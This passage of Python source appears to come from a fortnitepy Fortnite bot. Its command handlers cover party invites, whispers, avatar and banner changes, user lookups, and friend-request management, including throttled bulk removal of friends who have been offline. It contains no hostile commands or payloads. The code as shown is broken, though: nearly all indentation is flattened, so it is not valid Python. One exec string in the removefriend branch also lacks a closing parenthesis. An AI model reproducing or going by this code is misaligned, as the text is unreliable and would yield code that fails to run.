await reply(message, client, l('error_while_sending_partyinvite'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_invite_user')}"
await reply(message, client, text)
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_partyinvite'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
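# inviteall: schedule one invite task per user on the invite list without awaiting them.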
elif args[0] in commands['inviteall']:
try:
for inviteuser in client.invitelist:
    loop.create_task(client.party.invite(inviteuser))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
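# message: whisper a friend; rawcontent is split on ' : ' into target and message body.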
elif args[0] in commands['message']:
try:
text = rawcontent.split(' : ')
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if text[0] in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if text[0] in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(text[0])
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.send(text[1])
await reply(message, client, l('user_sent', name(friend), text[1]))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.send(text[1])
await reply(message, client, l('user_sent', name(friend), text[1]))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))""" for user in users.values()
],
"variable": [
{"user": user, "text": text} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_send')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['message']}] [{l('name_or_id')}] : [{l('content')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['partymessage']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['partymessage']}] [{l('content')}]")
return
await client.party.send(rawcontent)
await reply(message, client, l('party_sent', client.party.id, rawcontent))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
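# sendall: replay the same command on every loaded client via AllMessage, gather the
# tasks, then relay each client's collected replies back to the sender.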
elif args[0] in commands['sendall']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['sendall']}] [{l('content')}]")
return
tasks = {}
for client_ in loadedclients:
mes = AllMessage(rawcontent, message.author, client_, message)
task = loop.create_task(process_command(mes))
tasks[client_] = [task, mes]
await asyncio.gather(*[i[0] for i in tasks.values()])
for client_,list_ in tasks.items():
result = list_[1].result
if result.get(client_.user.id):
results = '\n'.join(result[client_.user.id])
await reply(message, client, f"[{name(client_.user)}] {results}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['status']:
try:
client.status_ = rawcontent
await client.change_status()
await reply(message, client, l('set_to', l('status'), rawcontent))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['status']}] [{l('content')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
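# avatar: set the Kairos avatar; the background is either three color values (args 2-4)
# or the name of a fortnitepy.KairosBackgroundColorPreset member.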
elif args[0] in commands['avatar']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['avatar']}] [ID]")
return
if len(args) > 4:
background_colors = [args[2], args[3], args[4]]
elif len(args) == 2:
background_colors = None
else:
background_colors = getattr(fortnitepy.KairosBackgroundColorPreset, args[2])
avatar = fortnitepy.Avatar(asset=args[1], background_colors=background_colors)
client.set_avatar(avatar)
await reply(message, client, l('set_to', l('avatar'), f"{args[1]}, {background_colors}"))
except AttributeError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('color_must_be'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['banner']:
try:
await client.party.me.edit_and_keep(partial(client.party.me.set_banner,args[1],args[2],client.party.me.banner[2]))
await reply(message, client, l('set_to', l('banner'), f"{args[1]}, {args[2]}"))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['banner']}] [{l('bannerid')}] [{l('color')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['level']:
try:
await client.party.me.edit_and_keep(partial(client.party.me.set_banner,client.party.me.banner[0],client.party.me.banner[1],int(args[1])))
await reply(message, client, l('set_to', l('level'), args[1]))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('must_be_int'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['level']}] [{l('level')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['bp']:
try:
await client.party.me.edit_and_keep(partial(client.party.me.set_battlepass_info,True,args[1],args[2],args[3]))
await reply(message, client, l('set_to', l('bpinfo'), f"{l('tier')}: {args[1]}, {l('xpboost')}: {args[2]}, {l('friendxpboost')}: {args[3]}"))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_bpinfo'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['bp']}] [{l('tier')}] [{l('xpboost')}] [{l('friendxpboost')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
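# privacy: map the matched subcommand onto the corresponding PartyPrivacy preset.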
elif args[0] in commands['privacy']:
try:
privacies = [
"privacy_public",
"privacy_friends_allow_friends_of_friends",
"privacy_friends",
"privacy_private_allow_friends_of_friends",
"privacy_private"
]
for privacy in privacies:
if args[1] in commands[privacy]:
priv = getattr(PartyPrivacy,privacy.replace("privacy_","",1).upper()).value
await client.party.set_privacy(priv)
await reply(message, client, l('set_to', l('privacy'), l(privacy.replace("privacy_","",1))))
break
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['privacy']}] [[{commands['privacy_public']}] / [{commands['privacy_friends_allow_friends_of_friends']}] / [{commands['privacy_friends']}] / [{commands['privacy_private_allow_friends_of_friends']}] / [{commands['privacy_private']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getuser']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getuser']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id}
try:
user = await client.fetch_user(rawcontent)
if user:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
text += f'\n{name(user)}'
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
friend = client.get_friend(user.id)
if not friend:
return
if not friend.nickname:
text += f'\n{str(friend.display_name)} / {friend.id}'
else:
text += f'\n{friend.nickname}({str(friend.display_name)}) / {friend.id}'
if friend.last_presence and friend.last_presence.avatar:
text += f"\n{l('avatar')}: {friend.last_presence.avatar.asset}"
if friend.last_logout:
text += "\n{1}: {0.year}/{0.month}/{0.day} {0.hour}:{0.minute}:{0.second}".format(friend.last_logout, l('lastlogin'))
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getpending']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getpending']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_pending(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_pending(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_pending(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
pending = client.get_pending_friend(user.id)
if not pending:
return
text += f'\n{str(pending.display_name)} / {pending.id}'
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getblock']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getblock']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_blocked(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_blocked(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_blocked(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
block = client.get_blocked_user(user.id)
if not block:
return
text += f'\n{str(block.display_name)} / {block.id}'
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
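# info: either dump the current party state or search the item database by ID/name,
# retrying with the secondary search language when the primary yields nothing.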
elif args[0] in commands['info']:
try:
if args[1] in commands['info_party']:
text = str()
text += f"{client.party.id}\n{l('member_count')}: {client.party.member_count}\n{client.party.playlist_info[0]}"
for member in client.party.members:
client.add_cache(member)
if data['loglevel'] == 'normal':
text += f'\n{str(member.display_name)}'
else:
text += f'\n{str(member.display_name)} / {member.id}'
send(display_name,text)
await reply(message, client, text)
if data['loglevel'] == 'debug':
send(display_name,json.dumps(client.party.meta.schema,indent=4),yellow,add_d=lambda x:f'```\n{x}\n```')
elif any(args[1] in commands[key] for key in ("cid", "bid", "petcarrier", "pickaxe_id", "eid", "emoji_id", "toy_id", "id")):
type_ = convert_to_type(args[1])
if rawcontent2 == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [ID]")
return
result = await loop.run_in_executor(None, search_item, data["search-lang"], "id", rawcontent2, type_)
if not result and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "id", rawcontent2, type_)
if not result:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
await reply(message, client, f"{convert_backend_type(result[0]['backendType'])}: {result[0]['name']} | {result[0]['id']}\n{result[0]['description']}\n{result[0]['rarity']}\n{result[0]['set']}")
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_show_info')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
await reply(message, client, f"{convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}\n{item['description']}\n{item['rarity']}\n{item['set']}")""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
elif any(args[1] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe", "emote", "emoji", "toy", "item")):
type_ = convert_to_type(args[1])
if rawcontent2 == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [{l('itemname')}]")
return
result = await loop.run_in_executor(None, search_item, data["search-lang"], "name", rawcontent2, type_)
if not result and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "name", rawcontent2, type_)
if not result:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
await reply(message, client, f"{convert_backend_type(result[0]['backendType'])}: {result[0]['name']} | {result[0]['id']}\n{result[0]['description']}\n{result[0]['rarity']}\n{result[0]['set']}")
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_show_info')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
await reply(message, client, f"{convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}\n{item['description']}\n{item['rarity']}\n{item['set']}")""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['info']}] [[{commands['info_party']}] / [{commands['item']}] / [{commands['id']}] / [{commands['outfit']}] / [{commands['backpack']}] / [{commands['pickaxe']}] / [{commands['emote']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
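# pending: bulk-accept (true) or bulk-decline (false) every incoming friend request.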
elif args[0] in commands['pending']:
try:
pendings = []
for pending in client.pending_friends:
client.add_cache(pending)
if pending.incoming:
pendings.append(pending)
if args[1] in commands['true']:
for pending in pendings:
try:
await pending.accept()
await reply(message, client, l('add_friend', f'{str(pending.display_name)} / {pending.id}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_friendrequest'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
elif args[1] in commands['false']:
for pending in pendings:
try:
await pending.decline()
await reply(message, client, l('friend_request_decline', f'{str(pending.display_name)} / {pending.id}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_declining_friendrequest'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['pending']}] [[{commands['true']}] / [{commands['false']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removepending']:
try:
pendings = []
for pending in client.pending_friends:
client.add_cache(pending)
if pending.outgoing:
pendings.append(pending)
for pending in pendings:
try:
await pending.cancel()
await reply(message, client, l('remove_pending', f'{str(pending.display_name)} / {pending.id}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friendrequest'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
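# addfriend: send a friend request to the resolved user (removefriend below is the mirror).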
elif args[0] in commands['addfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and not client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and not client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if not client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if client.has_friend(user.id):
await reply(message, client, l('already_friend'))
return
await client.add_friend(user.id)
await reply(message, client, l('friend_request_to', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if client.has_friend(user.id):
await reply(message, client, l('already_friend'))
return
await client.add_friend(user.id)
await reply(message, client, l('friend_request_to', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_friendrequest'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_send_friendrequest')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_friendrequest'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removefriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removefriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.has_friend(user.id):
await reply(message, client, l('not_friend_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('remove_friend', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.has_friend(user.id):
await reply(message, client, l('not_friend_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('remove_friend', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend')""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_friend')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeallfriend']:
try:
friend_count = len(client.friends)
await client.remove_all_friends()
await reply(message, client, l('remove_allfriend',friend_count))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
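# remove_offline_for: remove friends whose last logout is older than the given
# days/hours/minutes. Up to max_worker removals run concurrently; when Epic returns a
# throttling error, the shared Event pauses all workers for the advertised cooldown,
# the failed removal is retried once, and the workers are released again.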
elif args[0] in commands['remove_offline_for']:
try:
kwargs = {}
kwargs["days"] = int(args[1])
kwargs["hours"] = int(args[2]) if args[2:3] else 0
kwargs["minutes"] = int(args[3]) if args[3:4] else 0
offline_for = datetime.timedelta(**kwargs)
utcnow = datetime.datetime.utcnow()
event = asyncio.Event(loop=loop)
event.set()  # cleared while a worker backs off from a throttling error
removed = []
async def _(friend: fortnitepy.Friend):
last_logout = None
if friend.last_logout:
last_logout = friend.last_logout
elif friend.created_at > client.booted_utc:
last_logout = await friend.fetch_last_logout()
if last_logout and ((utcnow - last_logout) > offline_for):
await event.wait()  # blocks while another worker is backing off
try:
await friend.remove()
except fortnitepy.HTTPException as e:
if e.message_code != "errors.com.epicgames.common.throttled":
raise
if "Operation access is limited by throttling policy" not in e.message:
raise
event.clear()
await asyncio.sleep(int(e.message_vars[0]) + 1)
await friend.remove()
event.set()
removed.append(friend)
max_worker = 5
worker = 0
def dec(*args):
nonlocal worker
worker -= 1
tasks = []
val = len(client.friends)
for num,friend in enumerate(client.friends):
if worker >= max_worker:
await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED)
worker += 1
task = loop.create_task(_(friend))
task.add_done_callback(dec)
tasks.append(task)
await asyncio.gather(*tasks)
await reply(message, client, l('remove_allfriend',len(removed)))
await asyncio.sleep(2)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['remove_offline_for']}] [{l('day')}] [{l('hour')}]({l('optional')}) [{l('minute')}]({l('optional')})")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['acceptpending']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['acceptpending']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_pending(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_pending(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_pending(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.is_pending(user.id):
await reply(message, client, l('not_pending_with_user'))
return
await client.accept_friend(user.id)
await reply(message, client, l('friend_add', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.is_pending(user.id):
await reply(message, client, l('not_pending_with_user'))
return
await client.accept_friend(user.id)
await reply(message, client, l('friend_add', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_accepting_friendrequest'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_accept_pending')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_accepting_friendrequest'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['declinepending']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['declinepending']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_pending(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_pending(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_pending(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.is_pending(user.id):
await reply(message, client, l('not_pending_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('friend_request_decline', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.is_pending(user.id):
await reply(message, client, l('not_pending_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('friend_request_decline', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_declining_friendrequest'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_decline_pending')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_declining_friendrequest'))
except Exception:
